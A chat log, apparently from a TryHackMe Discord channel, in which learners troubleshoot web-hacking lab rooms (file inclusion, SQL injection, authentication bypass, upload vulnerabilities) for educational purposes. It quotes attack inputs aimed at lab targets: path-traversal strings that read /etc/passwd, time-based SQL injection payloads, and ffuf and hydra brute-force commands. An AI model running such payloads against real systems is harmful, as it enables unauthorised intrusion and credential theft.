#web-fundamentals-path
Gave +1 Rep to @halcyon mortar
Hi everyone. I’m in the Upload Vulnerabilities room, on the challenge part (task 11).
I ran into trouble getting Burp Suite to intercept and display the js files coming back from the target server.
Would appreciate some help. May I post details?
Yes, please do post more details
Cool, thanks. I start Burp Suite, set the scope to http://jewel.uploadvulns.thm, then edit the Proxy Options to remove ^js$| from the list of file extensions that Burp won’t intercept.
Then turn Intercept on and load http://jewel.uploadvulns.thm from my browser.
I use ‘Do intercept’ > ‘Response to this target’, to get Burp to display the js file sent back. This works the first time. Then whenever I try to reload the page (say when I want to modify one of the incoming js files in a different way), the js files are not displayed anymore. So I have no way to modify them. Quitting and restarting Burp Suite won’t help. Any way I can avoid that?
For file inclusion challenges, what is a good way to host these files to be accessed by the site
I tried this and while I can open in a tab, I get errors saying "couldn't connect to server"
and "failed opening"
uses https://http.cat/ to check what 304 response code is
is there an IP i should put it on?
or somewhere i can read about it
tun0?
How do I go about trying to troubleshoot this
I don't really know what to even search for to get a relevant result
oh my god damnit
my dumbass is thinking it's the port :
but you're right, it's the : in the actual file lmao
@halcyon mortar thanks for the help.
Gave +1 Rep to @halcyon mortar
Hi lassi. I actually had figured it was because of cached content. But clearing out the cache in my browser (Firefox btw) doesn't help. Restarting Burp neither. It seems I also have to quit the THM machine altogether, then restart one from the TryHackMe page, then edit my hosts file over again, etc.
Is there any setting in Burp Suite to ignore cached content and reload js files (or other files for that matter) regardless of the fact that they were already downloaded once?
Or actually, it may be more up to a setting on the browser? 🤔 Either way, a nudge would be appreciated.
There's a rewrite rule defined in Burp to require a non-cached response, you can enable that
And here I thought I was smart
So, why does private IP work for RFI and the public IP doesn't? I tried getting RCE on the RFI challenge in the File Inclusion room and was trying to access the shell via the public IP, but it didn't work. Then, I tried with Attackthebox's private IP and it worked
The target machines don't have internet
I see. Forgot about that 😄
Thanks James. Any clue where in Burp I can find that rule? Googling doesn't seem to turn up much.
Gave +1 Rep to @orchid hazel
Proxy options, I'll load burp rq
There are two, both non-cached
Great! I'll play with that and let you know. 👍
Hey
Can anyone give me a tip for Lab Challenge 3 on the File Inclusion room?
Don't know how to approach that one
../../../../etc/flag3
tried putting an url in the form
tried checking for cookies or headers
../../../../etc/flag3/.
../../../../etc/flag3%00
....//....//....//....//etc/flag3
The characters . / %00 and numbers aren't accepted, so I don't know what else to test
yes
Idk either what I want, but I'll try
Thanks
Gave +1 Rep to @halcyon mortar
That was actually not so hard, but a bit trippy on what I had to use.
Auth bypass task 2: bruteforcing a signup page does not produce the expected result. I've done this command: ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.63.46/customers/signup -mr "username already exists"
Unfortunately I can't post any screenshot there
How would one go about finding the ip address of a target webserver if it is not given? I am doing a challenge for the first time where we don't know the ip
Check out: https://tryhackme.com/room/dnsindetail
Thank you so much!!
Gave +1 Rep to @languid dirge
When I was doing the SQL Injection room and was on task 8, I noticed that sending admin123' UNION SELECT 1,sleep(2) from users where username='admin' and password like '_%';-- was giving a valid answer. Though the password didn't start with _, as I learned after a bit, I still don't understand why the web server gave me a valid answer (the time delay) when I provided the _ character in there
I didn't at the time, but now that you said so, I found out that by using underscore I can find out how many characters are in the field of data.
Thanks. I thought at the time that there was more going on (maybe on the server's db), but it seems like the underscore is used as a wildcard
Gave +1 Rep to @halcyon mortar
putting "&x=" in a URL makes it ignore the rest of the URL?
or does it have another effect?
like this: server.website.thm/flag?id=9&x=
for ssrf yes
why? is it related to encoding?
not sure exactly why no
thanks
I don't get why we use encoding
You can't send some data in URLs, or it can get messy.
If you want to send binary data as text, base64 is designed for that
what do you mean by binary data?
by some data do you mean parameters?
Non-text
By some data, I mean binary data
like what
If you try to send a file that has null bytes in, it won't work
You can't think of any files on your computer that aren't text files?
Programs, music, videos, database files, images
Only if you encode it
but why do we pass them in the URL
Why not?
How else are you going to send them? In the request body? That usually has to be encoded too
but "{id: 10}" is text data, why do we encode it
Because someone chose to
It'd usually be URL encoded if it was in a URL or request body, but here it's base64 instead
thank you man, appreciate it
I don't think so
referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';-- is not causing the sleep to work
in the blind sql time based room for sql injection
I think I did 'referrer=admin' and it worked
yay! done with the path!

kudos! 
I have a question:
I've come across these 3 tools: ffuf, gobuster and dirb.
I know that these 3 tools are used to bruteforce URIs to find hidden or public directories/files.
But what is the difference among these 3 tools?
try all 3 of them. some are faster with more options and so on. gobuster is pretty common. for myself I prefer ffuf
I see
So these 3 tools do almost the same things so choosing one of them will depend on the execution speed and other options
Ffuf is kinda different to the other two that you mentioned. It can do all the same and more. Read the manuals/docs/readme for each of them, and you'll understand what they do and do differently
Alright thanks
hi
SSRF task 2, after clicking "view site" there's no page loaded, it says "static-labs.tryhackme.cloud took too long to respond." I've tried re-entering the room as well as refreshing the page :/
I am facing the same problem
works for shadow
can you try clicking the minus button at the bottom and then clicking the view site button again???
tried
no work???
i mean it worked without clicking the minus button
all of a sudden it just worked haha thanks anyway
oh great
thanks!
Gave +1 Rep to @analog barn
Hello guys, can someone help me do the File Inclusion room? The Challenge part?
😦
Ok i will try harder 
The links at the bottom of that page are high-quality too. The Eric Steven Raymond link on catb.org is legendary.
http://catb.org/~esr/faqs/smart-questions.html
In no way a jab at your question forming capabilities @vestal tinsel , just a good read.
It would have been great if the modules had an audio playback option for the theoretical parts.
Try and send that to the feedback form that is linked in #feedback-and-ideas .. As then the staff of the website can see it easier and consider it
Yeah, I understood. It really was a great read! But in the end I've managed to do the challenge. I was on the wrong link! 😅
I did the same myself yesterday
is the wordlist from Task 11 installed in the attackbox? It seems to only lead me to install on my host machine
oh right, I am so sorry
Upload Vulns
Have a look and see
find wordlist.txt
If it's the attackbox the room won't matter.
Maybe @sand widget can help.
Ben, is the UploadVulnWordlist.txt on the Attackbox? I know it's a downloadable in task 11 in the room https://tryhackme.com/room/uploadvulns
It is not at the moment no
cc @trail bolt
Thanks.
Gave +1 Rep to @sand widget
No problem, do you think it'd be worth me adding it?
I would like it if you add it if you can, not sure if it's an issue.
I'm not sure tbh, as I used my VM and downloaded it and saved it to my VM anyway when I did it months ago, unsure about new users/old users who haven't done it.
a link to download it from the box would help too if anything.
Yeah that's okay. I think I see mention of upload vulns quite a lot so it seems pretty popular. I'll make a note to add it alongside the next set of changes for the attackbox (:
I appreciate it so much! I'll just go ahead and work on some other boxes then.
Oh, are you not able to access the wordlist?
If you're not, I'll put it on a machine real quick for you to wget/curl
if I can wget/curl to it, that would be awesome
I am happy with that
I use THM on my host machine so I normally just use the attackboxes
Yeah I'll sort that for you rn
Thanks!!
awesome, you are the best, I'll get it quick rn
sure 👍
No worries. I'll get it onto the AttackBox some time next week when I have other changes to make (:
+rep @restive hemlock
Gave +1 Rep to @restive hemlock
Hello guys, so I'm at the LFI challenge for the File Inclusion room, and I can't seem to find the etc/flag directory... Tried the following steps:
- changed POST from GET in the HTTP header using burpsuite
- used LFI techniques to show /etc/passwd, no luck
At this point, I got stuck not knowing other options.
Any hints will be much appreciated. Thank you.
got the flag now. Yeah you're right. GET and POST requests are different. Thanks for the help @halcyon mortar
Having an issue getting into the ctf webpage http://MACHINE_IP/challenges/index.php, receiving a 405 error
step one...: search for the task with a green start machine button... click it and wait for the ip to be revealed... make sure you are connected to the vpn or are using the attackbox and then connect when the ip is visible
the green public ip is what's giving me the error message
!docs verify
then a picture of the where you found the ip and where you are trying to connect
@chrome magnet ⬆️
well just like shadow thought you are connecting to the wrong ip
see task 2
see that it has a green start machine button inside it
hit that... then wait a while
then you will get a box like this
which will show an ip after about 1 min
@chrome magnet ⬆️
thank you
Gave +1 Rep to @sweet python
no problem
Hello, I am working on the Web Enumeration room and finished the "Practice: Gobuster" module. I was able to get the flags by typing the appropriate directories in the browser; however, I was wondering if there is a way to cat the flag file on the shell?
https://tryhackme.com/room/webenumerationv2
Can someone help me with the SSRF Room? I don't seem to understand how you can influence the output by changing the URL
What is it that you don't understand? Do you have a particular task?
Curl is the answer
Hey could someone help me out?
I'm on task 9 trying to wpscan the wpscan.thm site but get the following error: The remote website is up, but does not seem to be running WordPress...
full command plz
Hey yo
I'm stuck at web fundamentals > subdomain enumeration > task 6
Where is this fuff?
Mh? It's a tool installed on your attacking machine
What OS are you using? But ye, if ffuf is not installed you have to get it
Don't know if you are using the attackbox or the kali vm
But pretty sure ffuf is already on the attackbox
And most likely even on the kali vm
You type ffuf not fuff, right ?
Lol no
Well
I selected attack box > the start attack box
Ye, it's certainly on the attackbox
Not an issue
hi @misty shadow
can't find any subdomains using ffuf. subdomain enumeration module lab 6
this is the command I'm using -> ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.131.156
i think i did.. hold on
Hey there.
There is no need to ping anyone if you have a question, just state the room, task and any other useful information, if someone has an answer for you, they will reply 🙂
okay 👍
Wrong IP, you fuzz your own attackbox rather than the target machine
I don't know, you have to start the target machine and check the box that's looking like that:
Target machine = Green button in one of the tasks saying "Start Machine"
Oof, who do you expect to read all of that 😄
But at least you are trying to be detailed 😄
I'm going to delete it, and try and shorten it some more 😦 (that's the best I can do)
Hey Guys, I have a question regarding Local File Inclusion under the "Intro to Web Hacking" path.
In labs 1 through 3 the goal is to access a file (/etc/passwd) by exploiting a web application on a THM machine. The website looks like the following, and on labs 1&2 I can read the /etc/passwd file successfully in 1 of 2 methods
Method 1 - by using the search box provided on the website, and entering "/etc/passwd" on lab 1 and "../../../../etc/passwd" on lab 2 respectively.
Method 2 - by going into the URL, and simply entering the URL [Machine IP/lab1.php?file=/etc/passwd] [Machine_IP/lab2.php?file=../../../../etc/passwd] for lab 2 respectively.
Labs 1&2 give you access to the source code whereas lab 3 does not, due to this it states that we have to test the entry point and input an invalid input "THM" into the search bar provided to get the following error
- "Warning: include(includes/THM.php)[function.include]: failed to open stream: No such file or directory in /var/www/html/lab3.php on line 26"
This is to understand what directory we need to access (in this case, we need to move up 4 directories -
so in the search bar provided I enter "../../../../etc/passwd" and get the following error
- "Warning: include(includes/../../../../etc/passwd.php)[function.include]: failed to open stream: No such file or directory in /var/www/html/lab3.php on line 26"
Up to this point, Method 1 and Method 2 are not pulling the /etc/passwd file, but when I continue to read, they state that we have to add the "null byte" which is %00.
When I test Method 1 and enter "../../../../etc/passwd%00" it still returns an error
When I test Method 2 and modify the URL to read {MACHINE_IP/lab3.php?file=../../../../etc/passwd%00 - it does not receive any error and successfully pulls the /etc/passwd file.
I'm confused and uncertain on how to get Method 1 to be successful, but in Method 2, I understand and can read /etc/passwd. Is there a way for Method 1 (using the search bar provided on the website) to be successful?
If you enter the null byte in the search bar, it's getting URL encoded.
You should be able to see that in the url bar that it's appending %2500 instead of just %00
I do notice that yes, but I'm still uncertain on how to have method 1 be successful in reading /etc/passwd for that lab.
I see that my entire input gets encoded, and anything after file is broken up with %2f
Well, considering parameters in a GET request are being sent via the URL, I don't see the need to get method 1 working.
All the search bar is doing, is appending your input URL encoded to the URL as the "file" parameter
From the top of my head I can't think of a way to get it working from the search bar, but either way, it's kind of useless to put effort in that
well truthfully, I'm very new to this whole concept and environment and that's what I was trying to understand. in general, for this type of vulnerability, we wouldn't necessarily interact with the web page, but rather the URL and the vulnerability we're seeking to exploit?
Ye, I would say you would usually intercept that request in Burp and use repeater to play around and test, thus meaning you are just altering the parameter in the URL
Thank you for the help!
Gave +1 Rep to @misty shadow
Hello, can somebody help me with the crontab?
here is the question : When will the crontab on the deployed instance (10.10.183.70) run?
in the crontab file all is by default except one line and this is not the response
can you ping me ? thanks
Best to verify and show a screenshot of what you see in there
!docs verify
Correct and the answer is right in your screenshot
Just curious, is there a room for OAuth 2.0?
Hi all, I am halfway done with this path, I am learning about it because I knew less than nothing about web hacking
32% done
Hi. I checked my spelling and tried downloading ffuf. But the instructions say the AttackBox comes with it. Yet I'm faced with "ffuf: command not found". Can you advise where I went wrong? Appreciate it!
hi
```php
<?php
$str = 'INPUT HERE';
$pattern = '/flag/i';
echo $sec = preg_replace($pattern, '', $str);
?>
```
I want to reach $sec=='flag'
Is this part of an active CTF?
In the 'intro to web hacking' module right now, XSS room, last question. Task is to capture the cookie through XSS, base64 decode. This doesn't work though lol. Including the 'session=' or not, neither works. I ended up checking out a walkthrough and it shows the same method I did so I'm stumped
Are you using attackbox or your own VM?
@brazen mauve VM, said use AB if exploit doesn't work but I'm able to capture the cookie
Use attackbox for this task
different cookie?
you will get staff cookie
Gave +1 Rep to @brazen mauve
You got staff cookie?
oh yeah AB worked
Hey,
@Authentication bypass task 3, we use the ffuf tool to bruteforce a list of usernames with a list of passwords. The username list we created in task 2 by piping the results into a .txt file.
When trying to use this result in part 3, I don't get any output. However if I were to copy the content of the file and paste it into another .txt file, I get the correct results.
Any pointers for what the difference between a piped created file and a manually created file is?
It might output the file in a different format, where the line endings are different
guys what about a subdomain enumeration room, can you help me why ffuf -fs not filtering by size, i'm providing the most repeated one - 472
haha, that's funny, cuz the task pointing you that the first subdomain discovered should be written to the answer below, but actually it's the second xD
Are you on a VM or attackbox?
Because it works as intended in the attackbox.
on VM
Possibly why.
If you take the word list from the attackbox, it should work as intended.
okii, ty 😄 should i delete those msgs?
Just edit out the answer with spoilers or delete the flags.
Hey, I am currently doing the SQLi Room but I have a question, hopefully somebody could help me out here! ^^ So, a request to the server would be something like this "SELECT * from table", but it could also be something like "SELECT username,password from table". Why now are we checking for an SQLi by typing "1 UNION SELECT 1,2,3"? I don't mean the "1 UNION" part, but rather the following. Doesn't the * that got replaced by the "1,2,3" now just look for numbers in the table "table"? I am so confused
I'm confused by your question, but I think you maybe misunderstood the concept of UNION and the select part. First, the two parts before and after the union do not interact with each other in any way. They return tables and those two resulting tables are just concatenated. So the * and the 1,2,3 do not interact. You just need to make sure, both tables have the same number of columns. SELECT * does not tell you how many columns there are, so we have to try several options.
Second: SQL does not "look for numbers" . SELECT 1,2,3 is a simple query that just returns a table with 1 row and 3 columns containing the 3 numbers. Normally in SQL you write the column name in the select part, like SELECT user, password, email FROM x to tell SQL that you are only interested in those three columns. But you can also write SELECT user, 17, password FROM x. There you get again 3 columns and one row for each user. However the value in the second column will always be 17.
Not sure if this clears things up 🙂 I'd advise you to take some database and live execute manually some queries there and slowly progress to get an understanding how SQL behaves.
That helped a lot, thank you!
Gave +1 Rep to @obsidian roost
Glad to be here guys! 🙂 Hope to contribute to the community
This hacking path is exciting
Hope soon doing it!
Hi guys, I'm in the Authentication ByPass Module, I don't know if this is the right channel to ask.
The attackbox is deployed but I don't get the IP to practice
http://MACHINE_IP/customers/signup
I'm trying to see the Acme IT Support website with the Public and Private IP of the Attackbox but it doesn't work.
look for this icon on a task and then that green start machine button to start your target machine.... then wait 1-5 mins and you should get an ip
Thanks, it's working!
no problem
Guys, I'm in the module "Authentication Bypass"
I've been learning FFUF,
But do you know how to bypass a form when the action is to another file?
I'm using "-r" in the commands, but it doesn't work.
For example, I have the file "index.php" where the form is.
And this is the code
```html
<form action="welcome.php" method="POST">
<input type="text" name="password">
<input type="submit">
</form>
```
When I add a password "123", welcome.php returns "this is the flag"
I'm doing this with FFUF
ffuf -w passwords.txt -u https://url.com/index.php -X POST -d "password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -mr "this is the flag" -r
but it doesn't work.
I believe you need a username field and check your url https:..
Do you understand what action means on an HTML form element?
Have you looked at what's happening in Burp to try and understand?
No username in that form that they posted.
There's another bigger issue.
In the file inclusion room, shouldn't it be http://webapp.thm/index.php?lang=/etc/passwd instead of http://webapp.thm/get.php?file=/etc/passwd. If this is not a mistake on tryhackme's behalf, can someone explain how http://webapp.thm/get.php?file=/etc/passwd would work?
ok thanks!
Gave +1 Rep to @halcyon mortar
I just want to double check my understanding, but how would you explain the differences between RFI and SSRF?
I mean, they're completely different. The only similarity is that a request is made.
interesting. I obviously googled "SSRF vs RFI" etc. before messaging here and the answers I got are that an RFI basically is a type of SSRF. If you see them as completely different, can you clarify those differences for me?
I guess you could argue that but it's a really weird argument to make
why is it weird? what's the biggest difference that comes to your mind? From what I could understand, RFI deals with code injection from a remote file, whereas SSRF deals with any request made on the target server's behalf. Therefore, RFI and LFI attacks would fall into the category of an SSRF attack. What do you think?
"Inclusion" is a massive part of LFI and RFI, and people constantly confuse LFI and file read
thanks for your input James!
Gave +1 Rep to @orchid hazel
Hello can anyone suggest me the web fundamentals
I mean path or something like that
@halcyon mortar where do I find it?
Do you know anything about two sides?
Check hint, answer is there
The answer is not front end. Don't copy from the videos, you don't learn anything that way.
hi
Hi guys, for the Burp Suite - Intruder, I don't have the same thing on my burp as the one in the tutorial and I can't figure out how to, is it normal? If not, how do I fix it? Thanks
well maybe some update to burp suite changed it.... but the attackbox should work as it uses a version of burp that should work for all currently accessible rooms
i have :
```
Host: 10-10-25-68.p.thmlabs.com
```
the tutorial has :
```
POST /support/login/ HTTP/1.1
Host: 10.10.25.68
```
and at the end of this there is in the tutorial an id / passwd (that we'll use in the tutorial) but I don't have it...
Burp works but I don't have a webpage that allows me to apply the technique of the room
These are 2 different requests
I know, the first one is the one I have when I follow the room's instructions, and the second one is the one I am supposed to get, and I'm trying to understand what I'm doing wrong because what I have does not allow me to do the room's challenges
Which task are you doing ?
In the BurpSuite - Intruder, I'm at the Attack Types Sniper (Task 5)
i'm supposed to get something like this
But as I showed here I don't 😦
Yes, you have to make an actual login attempt to capture that request
How would I know if I see the message or not 😄
The last message I see is But as I showed here I don't
Share the link you are talking about
I'm using the attack box and I use this address, that is given in the first task : https://10-10-44-18.p.thmlabs.com
There is no login option
But you know the url, so just append /support/login to it
I tried but it didn't work, let me try again
I've relaunched everything
Ok there was something off but I think I've managed to get on the right path, thanks all for your help ^^
Why aren't the IPs showing up on the Linux Fundamentals page? The IP to ssh tryhackme@IPgoeshere is not available.
rephrase: Getting past task 2 in Linux Fundamentals 2 doesn't even give me the IP to ssh tryhackme@MACHINE_IP
the MACHINE_IP doesn't even show up on the page
so how the hell can i get past this
kinda bullshit imo
ok now it works
So, it's not bullshit after all?
Hey what's up? Need a hand here!
I am on task 7 on OWASP top 10 and it says to log into http://MACHINEIP:8888 but it does not work
Does it really say "machineip" in the text/url on the room page or did you change that just for discord?
just changed it for discord
Let me have the machine IP then pls
I just reset it for the third time
one minute
10.10.132.227:8888, it seems to be working now
Ok
thanks for the attention
No. I just realized how lacking my understanding was. Now I’m laughing about how easy that was!!
you just have to give the machine up to 1 minute to start and display the ip address, patience is key my friend
I'm getting closer to completing this path. Can't wait.
hi guys anyone can help with web fundamentals file inclusion task 8 challenge 4 RFI?
tried with s3 bucket, google disk, github, when entering url of attackbox, method is not allowed
not familiar with web hosting and stuff
tried apache2 installation but got error no ports available to listen -something like that
Port 80 on the attackbox is in use. Use a different port.
The target machines don't have internet access so all of those methods won't work.
apache is up, port changed, php file created that echoes gethostname(). when I do rfi on that file on the playground room, html displays the same output I get when running that file on its original domain
hmmmmmmmmmmmm
how then?
ftp?
I am attempting (and struggling) with the challenge task in file inclusion -- I've read the solutions/walkthroughs online require the use of burpsuite (something that has not been introduced in this learning path) -- is it possible to complete the challenge without using Burpsuite? the steps listed in the challenge encourage you to use the 'browser address bar' in its place, but I'm struggling to figure out how to do so. any advice would be appreciated.
You can use curl to complete those challenges if you don't know how to use burp
created python3 -m http.server
created php files: 1 with gethostname() other with php_uname('n') for older versions, tested in browser and there is download file link
when using these rfi urls in the target domain as ?file or ?lang, ?file gives warnings ("failed to open stream / could not connect to server / failed to open file for inclusion"), and when using ?lang the output is nothing
but i do not want the target server to download the file to its disk, right? i just want it to execute the code from remote url
I don't even see the target server making a get request to my http.server
but I see this 😅
(firefox:4639): GLib-GObject-CRITICAL **: 11:55:33.062: g_type_add_interface_static: assertion 'g_type_parent (interface_type) == G_TYPE_INTERFACE' failed
(firefox:4639): GLib-GObject-CRITICAL **: 11:55:33.062: g_type_add_interface_static: assertion 'g_type_parent (interface_type) == G_TYPE_INTERFACE' failed
(firefox:4639): GLib-GObject-WARNING **: 11:55:33.065: ../../../../gobject/gsignal.c:3492: signal name 'load_complete' is invalid for instance '0x7fd0b1d68ce0' of type 'MaiAtkType139'
(firefox:4639): GLib-GObject-WARNING **: 11:55:33.065: ../../../../gobject/gsignal.c:3492: signal name 'load_complete' is invalid for instance '0x7fd0b1d68d30' of type 'MaiAtkType139'
(firefox:4639): GLib-GObject-CRITICAL **: 11:55:33.158: g_type_add_interface_static: assertion 'g_type_parent (interface_type) == G_TYPE_INTERFACE' failed
(firefox:4639): GLib-GObject-CRITICAL **: 11:55:35.855: g_type_add_interface_static: assertion 'g_type_parent (interface_type) == G_TYPE_INTERFACE' failed
I don't think I did this
tried with .txt files instead, also no improvements
tried putting command code in quotes as file value, no luck
hey lassi, I have tried this and could not get it working.. any hint?
Thanks for the feedback; I'll dig into curl. Much appreciated.
Gave +1 Rep to @brazen mauve
Thanks for the feedback;
Gave +1 Rep to @halcyon mortar
Thanks for the feedback;
Gave +1 Rep to @orchid hazel
not sure.. localhost?
so its local, not public
0.0.0.0:port
must be local
invalid or unassigned.. ok then I guess I should check out how to make a public webserver with python
The definition in bold
ahhh ok got it
actually I don't get it completely
but conclusion is that my attackbox ip is the one to use
You can't use 127.0.0.1 or 0.0.0.0 as the IPs to request files from
Can you think about why?
What does 127.0.0.1 mean to the machine that's actually requesting the file?
Hi, I have a question on HTML Injection, why the heck is this exploitable? If a hacker has access to the web content of his own webpage, he can only phish himself and that is not what he wants. By the way, you can alter the web content of a webpage you see also when the server sends javascript code that sanitizes the user input. I've googled HTML Injection and I found that it is possible to redirect the target of e.g. a password. However, how could a hacker inject something to a user that is not much easier done with phishing & rebuilding/copy pasting the website?
Edit: I found an example, wikipedia and wikipedia-like websites. Are there any other examples?
Exploiting yourself is not beneficial, yes. But if it is possible to inject HTML code (apart from just modifying it in your browser), it might be possible to exploit it for others as well in same situations. Just like XSS vs. "Self-XSS".
Rebuilding the websites requires a different domain name while HTML injection allows using the domain of a known website. So it is more likely to succeed
you ask how is html injection exploitable? I think it is sent as a link to a legit but modified website that can easily trick the user to trust it because everything is the real thing. Only if you dig into the source code can you see that there is malicious code, and who does that
I might have a bit of a silly question, but I haven't quite found the right way to google it. Let's say you have a command like this curl http://vulnerable.app/process.php%3Fsearch%3DThe%20Beatles%3B%20whoami Why the %3F %3D %2 etc? I understand they are necessary for separation. But what determines how they look or is it just random? If anyone has an article or some information that I could read on html stuff like this I would be very grateful!
Google 'url encoding' that should explain everything
they are not random, they are actual characters
Wauw, never knew. Thanks so much man !
@obsidian roost @rare relic thank you both!
Gave +1 Rep to @obsidian roost
hey everybody, about burpsuite - intruder, Bonus Question - Optional: Use Intruder to automate the column enumeration of the Union SQLi in the Repeater Extra Mile exercise.
What is expected from us to do here?
in the original question, solution was presented using group_concat so how do we automate this and for what purpose?
hello everyone i am stuck in 1 room at portswigger can you help me
11:room
i found password but not access
I don't understand, what is entropy ?
it is a measure of randomness, at least when you are talking about malware analysis
there is also another meaning that is from Chemistry
thermodynamics thing
Entropy describes something that was created to be used only once
hi there have a problem (i'm french for learn tryhackme ) i have a base in cybersecurity but have a problem for a question :
What do you need to access a web application? (I tried Web browser, software, and others and no way and yet it is necessarily that to launch a web application
may be the spelling in english
I don't know, any help would be appreciated)
can you provide a link to the room please
it's good it was about extra character I won't say the answer here so as not to bother other learners but it's good, thank you all the same for your speed of response 🙂
Gave +1 Rep to @sweet python
oh yeah shadow found the room and remember the answer just wanted to be sure before hinting at the solution
We don't have the same term in French or at least the same translation concerning certain terms, it's far from your fault 🙂 I just have to read and understand English better and know how to use the right words
Content Discovery
Here's a new problem I'm having:
we were asked to access http://VirtualIP/robots.txt knowing that it updates every 2 minutes
the question asks me the trajectory to get there but already the small flat: Error Response Method not allowed (What I understand that the method does not have the right one) or that I do not have the right.
but in logic the trajectory remains the same / Trajectory(ip)/robots.txt
I clearly understand how it works but this doesn't accept any of my answers.
Ha yes but what an idiot I am (I thought that the machine that we launch to work hosts in the same way our machine in which the attack must take place.)
Hi I have a problem with the room Burp Suite: Repeater. I’m currently working on task 6, I add the header as the task says but I have no response within Burp. I checked connection, VPN and everything is working, what could it be? Thanks
I receive an empty response after 30 seconds more or less
To complete the context, when I intercepted the request for the first time and forwarded (or repeated) it without modifying anything, everything worked and I had a correct response; after I added the header as the task says it suddenly stopped working
I tried with cURL and worked, I don’t know if there is something wrong elsewhere
Oh ok, thank you 🙏
hi all, working on the "viewing source page" i have difficulties to reply to the
What is the flag from the secret link?
i found one after following the link found into the thm-web-framework, found a flag
but doesn't work for me
Try to take a closer look at line 41 when you "View Page Source", you might find what you look for 🙂
oops, thanks so much @gilded steppe 🙂
Gave +1 Rep to @gilded steppe
I think I need help. I am stuck on Task 8. I found the directory, but I can't upload my shell. No matter what file extension. Tried php4, php5, pht, phtml, phar. Is my room bugged?
Additional info: Working through VPN, hosts-file has been updated. I was able to clear the previous tasks.
You might also want to state the room that you are doing, since this path has quite a few 🙂
@misty shadow lmao - my bad. Upload Vulnerabilities Task #8 (Web Hacking Fundamentals)
Did you read that part of the task and tried it?
In the previous example we saw that the code was using the pathinfo() PHP function to get the last few characters after the ., but what happens if it filters the input slightly differently?
Let's try uploading a file called shell.jpg.php. We already know that JPEG files are accepted, so what if the filter is just checking to see if the .jpg file extension is somewhere within the input?
I did try it with my shell as .jpg.php5 and .png.php5 but both didn't work. I just assumed a picture format and took jpg for granted but couldn't make sense of the script files I found.
So what regular file format does the upload form support?
Did you enumerate that?
I look into that. I think I missed something. Thank you @misty shadow
Gave +1 Rep to @misty shadow
Mh, alright 😄
Hello! I am working through the authentication bypass room and was wondering, for the ffuf tool, why I do not have to put any of the other headers with the -H tag, only the "Content-Type:" one (at least in this case). Does it automatically put in all the other ones like "Accept-Encoding:", "Origin", "Referer:", etc. ?
would assume yes
or at least the default ones that a POST request uses
Okay, cool
Thanks!
Gave +1 Rep to @sweet python
no problem
got a problem with the owasp task 26 (insecure deserialization - code execution). the provided python script to generate the payload throws errors "mode pickle has no attribute dumps". anyone an idea?
hello, i'm currently stuck at the walking an application course. There seems to be an issue with the website i'm told to work with, it keeps giving me the "504 gateway time-out". Anyone knows how to help? 🫶
Are you connecting to it via the machine IP or the provided URL? (The one that ends with thmlabs.com)
Yeah, I seemed to work out that issue now. Thanks for responding 
Gave +1 Rep to @misty shadow
Not an issue, just so you aware, these provided URLs with LAB_WEB_URL.p.thmlabs.com sometimes take a bit longer to get accessible 🙂
got it thanks 😄
Upload Vulnerabilities, Task 4, site overwrite.uploadvulns.thm does not exist.
I have started the machine and using AttackBox
Did you add them all to the hosts file?
I have edited the /etc/hosts file and added the addresses
Hi all, i was playing with OWASP Juice Shop, exercise to brute force the admin password using Burp. I did it easily. I tried to do it with hydra and it is not working and i'm wondering why 😦 what i did is : sudo hydra -l admin@juice-sh.op -P /usr/share/seclists/Passwords/Common-Credentials/best1050.txt 10.10.144.127 http-post-form "/rest/user/login/login:username=^USER^&password=^PASS^:F=Invalid email or password."
and i don't understand my mistake 😦
oops, i understand 😦 here is the right command : sudo hydra -l admin@juice-sh.op -P /usr/share/seclists/Passwords/Common-Credentials/best1050.txt 10.10.144.127 http-post-form "/rest/user/login/email=^USER^&password=^PASS^:F=Invalid email or password."
a wrong copy paste 🙂
doubt theoretical content of Burpsuite repeater
can anyone help me?
The last line...As we know the table name and number of rows.....Table name I guess we found it by adding the ' to the GET..how were the number of rows determined
I feel like I'm probably missing something obvious. I'm doing OWASP top 10 task 5 and the site is not loading through attack box
just tried it and it seems to be working fine! can you tell me exactly what you did to try to access the website?
that looks like they meant to say number of columns rather than rows
hey i'm on ctf pickle rick i think it would be necessary to brute force the password of the user with hydra but that does not work, would somebody have a track?
thx ...
try typing http:// before overwrite.uploadvulns.thm !
There is password located on web server
I find Ricketmorty, this is a username, i try bruteforce with burp (intruder) but it gives nothing
i find also a directory /login.php
Its not the correct username, check source code and robots.txt
i find ahah i search the 3rd flag
@placid spade I opened attackbox and entered the attackbox ip followed by /evilshell.php and I keep getting a 405
Wrong ip.
You keep to start the machine.
@restive hemlock Awesome I figured it out thank you!
Gave +1 Rep to @restive hemlock
@ornate stag so that means also not in here 🙂 see Jabbas message
hey i am in the subdomain enumeration room, task 6 (virtual hosts). wondering if "acmeitsupport.thm" is a URL?
if so, why am i not able to access it and only able to access through 10.10.69.197?
also why are we filtering my 200 success code here? and why is 302 code the right answer? for task 3 under authentication bypass room
but why are we getting ok? shouldn't we be getting 400 if the password is wrong?
i thought each request is sent to the webserver with the user name and password and if we have the wrong password, shouldn't we be getting 403
no... it returns a working html page even if your password is incorrect just with the message password or username incorrect
302 means it's most likely going to redirect you to another page
is that typical on how webpages work? then how would you typically enforce lockout restrictions etc? wouldn't it be based on response?
for some websites yes... just because there are http status codes to handle things does not mean you gotta use them for things like incorrect passwords
ah right, ok, thanks! 🙂
as in a lot of cases displaying what for many is an obscure error message ( 403 ) to a user that typoed their password is bad
showing a small box that says login failed password incorrect is better
also glad shadow could help
🙂
when set-cookies are sent by the webserver, is it typically encoded, hashed or plain-text?
or can it be anything?
It should be encoded, yes
but it can be easily de-coded though, right
can it not be hashed
Normally you'll find a base64
Btw awesome name, Mosby boys, like how I met ur mom 😁
haha
thanks
was wondering can you had set cookies when they are sent from webserver to user agent
Yes that's possible
And you can play around with it to see if there's a vulnerability
Maybe this can help you out https://resources.infosecinstitute.com/topic/risk-associated-cookies/
Thank you! 🙂
Another question, why does the last question on task5 for file inclusions use ?lang=thm-profile and not file=thm-profile?
That's how the application is built. It's not obvious that it's including a file, it isn't always obvious in the real world either
